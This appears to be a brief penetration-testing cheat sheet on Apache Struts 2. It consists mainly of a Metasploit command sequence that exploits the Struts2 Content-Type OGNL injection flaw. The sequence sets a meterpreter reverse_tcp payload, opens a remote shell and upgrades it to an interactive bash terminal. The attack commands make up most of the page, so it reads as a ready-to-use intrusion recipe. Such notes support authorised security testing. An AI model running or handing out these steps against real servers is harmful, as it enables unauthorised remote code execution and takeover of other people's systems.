Apache Struts Pentesting
Last modified: 2022-11-22
An open-source web application framework for developing Java EE web applications.
Struts2 OGNL Elavasion
Metasploit is useful for exploiting.
msfconsole
msf > use multi/http/struts2_content_type_ognl
msf > set payload linux/x86/meterpreter/reverse_tcp
msf > exploit
meterpreter > shell
SHELL=/bin/bash script -q /dev/null